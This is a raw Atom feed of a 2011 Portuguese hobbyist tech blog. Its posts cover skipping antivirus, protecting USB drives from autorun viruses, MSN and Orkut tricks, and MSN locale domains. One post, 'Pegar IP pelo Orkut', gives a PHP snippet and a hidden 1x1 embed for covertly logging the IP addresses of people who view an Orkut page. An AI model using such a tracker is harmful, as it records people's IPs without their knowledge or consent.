gratuita.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Como saber se o sistema está infectado? Se aparentemente seu computador funciona normal, e você quer saber se ele está infectado, pode valer a pena rodar um anti-spyware (como o SpyBot) ou até mesmo um antivírus, mandando fazer uma varredura completa. Aqui usamos os programas para aproveitar o tempo de processamento do computador, sua agilidade em comparar informações, em varrer vários arquivos e chaves do registro em busca de spywares conhecidos, etc. Usar um antivírus residente é o que eu não recomendo, pelo menos não uso, por ser definitivamente um item inútil (desde que você tome todos os devidos cuidados e outros). Não é para seguir uma receita, são um conjunto de atitudes que podem mudar isso. Se você se sentir mais seguro, fique com seu antivírus.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Além de usar programas de detecção, vale curiar no gerenciador de tarefas de tempos em tempos (dica: use o Process Explorer NT, que é bem melhor), no MSConfig, e ver se nada de estranho ou novo aparece por ali, sem que você tenha instalado.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Quer segurança? Cuide-se você. Eu não uso antivírus, continuo batendo o pé. Se você for firme nos seus atos, poderá não usar também. Basta manter o Windows atualizado, um firewall ativo (isso é essencial!) e o principal: não sair executando qualquer porcaria que chegue por email, não instalar controles Active-X no IE de sites suspeitos, não instalar qualquer barra de ferramentas no IE (elas atuam como programas, podendo fazer o que quiser!), não baixar anexos de emails suspeitos, sempre confirmar com quem lhe enviou antes de abrir um link de algum arquivo executável para baixar (principalmente se for de extensão .exe, .com, .bat, .cmd, .scr, .pif), etc.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Na sugestão de configuração mais acima, pedi para mostrar todas as extensões. Isso pode parecer ruim num primeiro momento para usuários básicos, mas permite que você identifique melhor o arquivo. Alguns mal intencionados colocam duas extensões nos arquivos, por exemplo, foto.jpg.exe. A última é a que vale: "foto.jpg.exe" é um programa, não uma imagem. Se as extensões não fossem mostradas, o Windows exibiria apenas "foto.jpg", e os mais inocentes poderiam abrir, rodando o malware. Com elas sendo mostradas você sempre verá a extensão real. Se você der um duplo clique num malware ou vírus, estará autorizando a execução dele no computador, estará fazendo justamente o que o autor dele quis.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Não é que o Windows seja inseguro (mas claro que não é a melhor coisa em termos de segurança também, está muito longe disso ;), é a falta de informação e conhecimento dos usuários que o torna assim.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O Windows Vista não tem grandes mudanças estruturais com relação ao XP. Vendo-o e acompanhando a história do Windows, às vezes penso: "Puxa vida, estragaram o NT...". O que mais se destaca no Vista em termos de segurança - e que ao mesmo tempo mais irrita os usuários, tanto é que boa parte opta por desativar - são as confirmações pedidas ao usuário para diversas tarefas e ações.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Você é o dono do seu computador, você decide o que quer rodar nele. Se você rodar porcaria, o Windows não tem culpa, ele irá executar a porcaria que você autorizou! O Vista pede muita confirmação, tudo bem, com isso você pode ver que se o usuário desse menos mole, teria seu Windows funcionando por muito mais tempo. Não estamos falando aqui de falhas do sistema (que quase todo software possui), mas sim de programas do mal em geral.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;De nada adianta você ter saúde e andar seguro se alguém lhe assaltar na rua e te jogar no chão. Você vai cair, não vai? Quando programas do mal tentam invadir o Windows, a maior brecha está no usuário, não no sistema. Cuide-se! (Eu continuo sem antivírus ;).&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-4039295739309884801?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ZgllZC7et97erAkk6ziVFr3zN0M/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ZgllZC7et97erAkk6ziVFr3zN0M/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ZgllZC7et97erAkk6ziVFr3zN0M/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ZgllZC7et97erAkk6ziVFr3zN0M/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/1m6bLtpQ4YM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/4039295739309884801/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/removendo-qualquer-tipo-de-virus-na.html#comment-form" title="2 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/4039295739309884801?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/4039295739309884801?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/1m6bLtpQ4YM/removendo-qualquer-tipo-de-virus-na.html" title="Removendo qualquer tipo de vírus na &quot;raça&quot;" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>2</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/removendo-qualquer-tipo-de-virus-na.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eCp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-2010627567853201806</id><published>2011-03-23T05:28:00.000-07:00</published><updated>2011-03-24T06:17:23.820-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.820-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Evitando Virus no PenDriver .</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;1º abra o Windows explorer e clique com o botão direito do mouse sobre a letra q corresponde ao seu pen drive&lt;br /&gt;
&lt;br /&gt;
2º escolha a opção formatar e marque a opção formatação rápida no pen drive infectado;&lt;br /&gt;
&lt;br /&gt;
3º clique em iniciar executar e digite : convert F: /fs:ntfs&lt;br /&gt;
Lembrando q F: seria a letra do seu pen drive, então substitua pela letra q corresponde seu pen drive&lt;br /&gt;
&lt;br /&gt;
5º crie uma pasta onde vai guardar seus arquivos&lt;br /&gt;
&lt;br /&gt;
6º no menu ferramentas/opções de pasta… clique na aba modos de exibição e arraste a barrinha q tem no meio da janela até o final e desmarque a opção usar compartilhamento simples de arquivo e clique em ok;&lt;br /&gt;
&lt;br /&gt;
7º volte ao seu pen drive e com o botão direito do mouse sobre a letra do seu pen drive e escolha a opção compartilhamento e segurança clique na aba segurança e remova todos os compartilhamentos existes, em seguida clique no botão adicionar vai abrir outra telinha digite todos e clique ok, daí vai voltar pra tela anterior, deixe selecionada somente a opção de permitir leitura;&lt;br /&gt;
&lt;br /&gt;
7º no seu pen drive e clique com o botão direito do mouse sobre a pasta q vc criou dentro do pen drive e escolha a opção compartilhamento e segurança clique na aba segurança e selecione todas as opções de permitir e clique em ok;&lt;br /&gt;
&lt;br /&gt;
8º clique novamente com o botão direito do mouse sobre a letra do seu pen drive e escolha a opção compartilhamento e segurança clique na aba segurança e remova todos os compartilhamentos existes, em seguida clique no botão adicionar vai abrir outra telinha digite todos e clique ok, daí vai voltar pra tela anterior, deixe selecionada somente a opção de permitir leitura;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Resumindo: O q vc acabou de fazer?&lt;/strong&gt;&lt;br /&gt;
Vc pegou seu pen drive q era em&amp;nbsp;&lt;span style="color: red;"&gt;fat32&lt;/span&gt;,&lt;br /&gt;
transformou pra sistema de arquivos&amp;nbsp;&lt;span style="color: red;"&gt;NTFS&lt;/span&gt;, onde liberou a pasta q criou dentro do seu pen drive pra acesso total e bloqueou a raíz do seu pen drive pra somente leitura.&lt;br /&gt;
Fazendo isso impediu q qualquer coisa seja copiada pra raiz do seu pen drive, so pode ser copiado algum arquivo pra dentro da pasta criada no pen drive.&lt;br /&gt;
Como os vírus q atacam o pen drive comumente rodam diretamente na raíz do pen drive torna quase impossível um vírus se Auto copiar pra raiz do pen drive, pelas limitações q vc acabou de criar.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-2010627567853201806?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nIZWxX29IsoGqV9-oam7UrmjWDs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nIZWxX29IsoGqV9-oam7UrmjWDs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nIZWxX29IsoGqV9-oam7UrmjWDs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nIZWxX29IsoGqV9-oam7UrmjWDs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/uAvl5dR20sc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/2010627567853201806/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/evitando-virus-no-pendriver.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2010627567853201806?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2010627567853201806?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/uAvl5dR20sc/evitando-virus-no-pendriver.html" title="Evitando Virus no PenDriver ." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/evitando-virus-no-pendriver.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEARHY5fyp7ImA9WhZTGE4.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-3041492200121502943</id><published>2011-03-22T14:28:00.001-07:00</published><updated>2011-03-22T15:24:05.827-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-22T15:24:05.827-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Aumente sua foto no MSN .!</title><content type="html">&lt;span class="Apple-style-span" style="color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;a href="http://www.baixaki.com.br/download/manycam-virtual-webcam.htm" style="color: #97a931; font-size: 11px; font-weight: normal; outline-style: none; text-decoration: none;" target="_blank"&gt;http://www.baixaki.com.br/download/manycam-virtual-webcam.htm&lt;/a&gt;&lt;br /&gt;
2º passo instale&lt;br /&gt;
3º passo : abra o Manycam , desmarque o " ✔ " do "Show Manycam logo&lt;br /&gt;
print :&lt;a href="http://images.orkut.com/orkut/photos/OQAAAAvE4TLGfoqvkSN7pcwf26t34utSjHwuh7LOSl_n17ErPmkFtdpvkhOSd3hyKf7LHTDrytcGz9nqvbO9kXp31V0Am1T1UImBGFsoV-1_JT4O2m_uf1bifuJe.jpg" style="color: #97a931; font-size: 11px; font-weight: normal; outline-style: none; text-decoration: underline;" target="_blank"&gt;http://images.orkut.com/orkut/photos/OQAAAAvE4TLGfoqvkSN7pcwf26t34utSjHwuh7LOSl_n17ErPmkFtdpvkhOSd3hyKf7LHTDrytcGz9nqvbO9kXp31V0Am1T1UImBGFsoV-1_JT4O2m_uf1bifuJe.jpg&lt;/a&gt;&lt;br /&gt;
4º passo : agora vai la na Barra Sources la em cima , pros cegos que nao acharam olhem o print :&lt;a href="http://images.orkut.com/orkut/photos/OQAAAKXtYjdqBB0O3VDqLIPC4FZ-FvsHZoOs6t7hBDyCkahu2M65jTWOJbUjCZd2CGLQIkj-5nlzNIBKBtXIAMmpXyQAm1T1UOy76c78M6NfkTuB1E4oCqhfUi4O.jpg" style="color: #97a931; font-size: 11px; font-weight: normal; outline-style: none; text-decoration: none;" target="_blank"&gt;http://images.orkut.com/orkut/photos/OQAAAKXtYjdqBB0O3VDqLIPC4FZ-FvsHZoOs6t7hBDyCkahu2M65jTWOJbUjCZd2CGLQIkj-5nlzNIBKBtXIAMmpXyQAm1T1UOy76c78M6NfkTuB1E4oCqhfUi4O.jpg&lt;/a&gt;&lt;br /&gt;
5º passo : clica ali no menu " Still images" mostrado no print acima ^&lt;br /&gt;
6 º passo : ali em baixo você vai ver " Recents files " clique em "Open new file e escolha a imagem que vc quer colocar&lt;br /&gt;
7º passo : vai no seu msn , na parte que vc troca a foto , print :&amp;nbsp;&lt;a href="http://images.orkut.com/orkut/photos/OgAAADPOeh87EWdGrQTSJbMdxFUK2N-FqPX58cKCcjld-CCrWwoaZVyhx2-AvrlBkagY6qRyhPKJ_in4cJRTZwnWI7UAm1T1UArDQze_dwh7ibFFWOvkv7yUbNhG.jpg" style="color: #97a931; font-size: 11px; font-weight: normal; outline-style: none; text-decoration: none;" target="_blank"&gt;http://images.orkut.com/orkut/photos/OgAAADPOeh87EWdGrQTSJbMdxFUK2N-FqPX58cKCcjld-CCrWwoaZVyhx2-AvrlBkagY6qRyhPKJ_in4cJRTZwnWI7UAm1T1UArDQze_dwh7ibFFWOvkv7yUbNhG.jpg&lt;/a&gt;&lt;br /&gt;
8º passo : clica la em Imagem dinâmica ... , ira aparecer uma caixa la com essas opçoes fotos ou gif , gif para se vc quiser que sua foto fique em movimento no msn (dooe)&lt;br /&gt;
9º passo : clique em foto , se for uma foto , ou em video se for um gif ( claro ) , e aparte em concluido , pronto sua foto ja ta grande&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-3041492200121502943?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ufqbSCBDiV4CIqG970IfifNyess/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ufqbSCBDiV4CIqG970IfifNyess/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ufqbSCBDiV4CIqG970IfifNyess/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ufqbSCBDiV4CIqG970IfifNyess/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/_rvsQN6GXvk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/3041492200121502943/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/aumente-sua-foto-no-msn.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3041492200121502943?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3041492200121502943?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/_rvsQN6GXvk/aumente-sua-foto-no-msn.html" title="Aumente sua foto no MSN .!" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/aumente-sua-foto-no-msn.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEMSXg6eCp7ImA9WhZTGE4.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-7985952992079885041</id><published>2011-03-22T14:26:00.001-07:00</published><updated>2011-03-22T15:24:48.610-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-22T15:24:48.610-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Pegar IP pelo Orkut . !</title><content type="html">&lt;span class="Apple-style-span" style="color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;Para pegar o IP pleo orkut de quem entra na sua página de recados é simples !&lt;br /&gt;
&lt;br /&gt;
Vc copia esse código e cola no bloco de notas&lt;br /&gt;
&lt;br /&gt;
____________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
&lt;br /&gt;
$ip = $_SERVER['REMOTE_ADDR']. "\n";&lt;br /&gt;
&lt;br /&gt;
$fp = fopen("Bruttus.txt", "a");&lt;br /&gt;
fputs ($fp, "IP BY C:\&amp;gt;Bruttus.bat: $ip");&lt;br /&gt;
fclose($fp);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
____________________________________________&lt;br /&gt;
&lt;br /&gt;
E salva em qualquer coisa.php&lt;br /&gt;
&lt;br /&gt;
E lá em baixo coloca TODOS OS ARQUIVOS !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Após isso v6 vão hospedar esse código no www.110mb.com&lt;br /&gt;
&lt;br /&gt;
Após ter hospedado vc vão por o seu link nesse código aqui&lt;br /&gt;
&lt;br /&gt;
&amp;lt;embed src="/SEU_LINK"height="1" width="1"&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Aí vc copia e põe lá na sua pág de recados !&lt;br /&gt;
&lt;br /&gt;
No 110mb vc clica em Return back to main menu&lt;br /&gt;
&lt;br /&gt;
Aí clica em :http://seu NOME.110mb.com&lt;br /&gt;
&lt;br /&gt;
Nele, se vc não mudou lá o código vc vai colocar Bruttus.txt&lt;br /&gt;
&lt;br /&gt;
Vai ficar assim&lt;br /&gt;
&lt;br /&gt;
http://seu NOME.110mb.com/Bruttus.txt&lt;br /&gt;
&lt;br /&gt;
Pronto os IPS vão aparecer aí !&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-7985952992079885041?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/yrn01It6f9TlwByidYRk6dIXxaY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yrn01It6f9TlwByidYRk6dIXxaY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/yrn01It6f9TlwByidYRk6dIXxaY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yrn01It6f9TlwByidYRk6dIXxaY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/Qydfs7SwMNo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/7985952992079885041/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/pegar-ip-pelo-orkut.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7985952992079885041?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/7985952992079885041?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/Qydfs7SwMNo/pegar-ip-pelo-orkut.html" title="Pegar IP pelo Orkut . !" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/pegar-ip-pelo-orkut.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eSp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-2130357889712053258</id><published>2011-03-22T14:24:00.001-07:00</published><updated>2011-03-24T06:17:23.821-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.821-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Envie depoimento pra vc mesmo ..</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;Galera vou ensinar como mandar depoimento para si mesmo, sem o uso de programas e javascript.&lt;br /&gt;
-&lt;br /&gt;
1º Vá em iniciar e no canto inferior esquerdo terá "convidar amigos" coloque qualquer e-mail lá. ex: (&amp;nbsp;&lt;a href="mailto:qualquermerda@hotmail.com" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;qualquermerda@hotmail.com&lt;/a&gt;)&lt;br /&gt;
-&lt;br /&gt;
2º Depois vá em&amp;nbsp;&lt;a href="http://www.orkut.com.br/Main#ShowFriends" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;http://www.orkut.com.br/Main#ShowFriend&lt;wbr&gt;&lt;/wbr&gt;s&lt;/a&gt;&amp;nbsp;e do lado do e-mail que você acabou de mandar terá "editar" clique em editar e no campo do e-mail que no caso está&amp;nbsp;&lt;a href="mailto:qualquermerda@hotmail.com" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;qualquermerda@hotmail.com&lt;/a&gt;&amp;nbsp;você coloca o seu e clique em atualizar.&lt;br /&gt;
-&lt;br /&gt;
3º Clique em sair e entre denovo no seu orkut. seu convite estara lá mas não da para aceitar ainda.&lt;br /&gt;
-&lt;br /&gt;
4º Repita todo o proscedimento acima novamente (colocar e-mail em "convidar amigos",colocar o seu e-mail em&lt;a href="http://www.orkut.com.br/Main#ShowFriends," style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;http://www.orkut.com.br/Main#ShowFriend&lt;wbr&gt;&lt;/wbr&gt;s,&lt;/a&gt;&amp;nbsp;sair e entrar no orkut).&lt;br /&gt;
-&lt;br /&gt;
Pronto você se add no orkut agora é so mandar o depoimento:&lt;br /&gt;
&lt;a href="http://www.orkut.com.br/Main#TestimonialWrite" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;http://www.orkut.com.br/Main#Testimonia&lt;wbr&gt;&lt;/wbr&gt;lWrite&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-2130357889712053258?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/MUl-hP6WqHnJWL7EjPU0dkd9R5M/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/MUl-hP6WqHnJWL7EjPU0dkd9R5M/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/MUl-hP6WqHnJWL7EjPU0dkd9R5M/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/MUl-hP6WqHnJWL7EjPU0dkd9R5M/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/RK4slHDNLt8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/2130357889712053258/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/envie-depoimento-pra-vc-mesmo.html#comment-form" title="1 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2130357889712053258?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/2130357889712053258?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/RK4slHDNLt8/envie-depoimento-pra-vc-mesmo.html" title="Envie depoimento pra vc mesmo .." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/envie-depoimento-pra-vc-mesmo.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eSp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-8619052599349759365</id><published>2011-03-22T14:22:00.001-07:00</published><updated>2011-03-24T06:17:23.821-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.821-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Crie MSN com dominios de outros Paises .!</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;Pegue o endereço&amp;nbsp;&lt;a href="https://signup.live.com/signup.aspx?mkt=pt-BR" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;https://signup.live.com/signup.aspx?mkt&lt;wbr&gt;&lt;/wbr&gt;=pt-BR&lt;/a&gt;&amp;nbsp;e mude o final (pt-BR) para o que quiser !&lt;br /&gt;
Ex:&amp;nbsp;&lt;a href="https://signup.live.com/signup.aspx?mkt=" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;" target="_blank"&gt;https://signup.live.com/signup.aspx?mkt&lt;wbr&gt;&lt;/wbr&gt;=&lt;/a&gt;&lt;strong&gt;ar-XA&lt;/strong&gt;&lt;br /&gt;
Domínios:&lt;br /&gt;
Arabic - windowslive.com ar-XA&lt;br /&gt;
Argentina - live.com.ar es-AR&lt;br /&gt;
Australia - live.com.au en-AU&lt;br /&gt;
Austria - live.at de-AT&lt;br /&gt;
Belgium - live.be fr-BE&lt;br /&gt;
Canada - live.ca en-CA&lt;br /&gt;
Chile - live.cl es-CL&lt;br /&gt;
China - live.cn zh-chs-cn&lt;br /&gt;
Denmark - live.dk da-DK&lt;br /&gt;
Finland - windowslive.com fi-FI&lt;br /&gt;
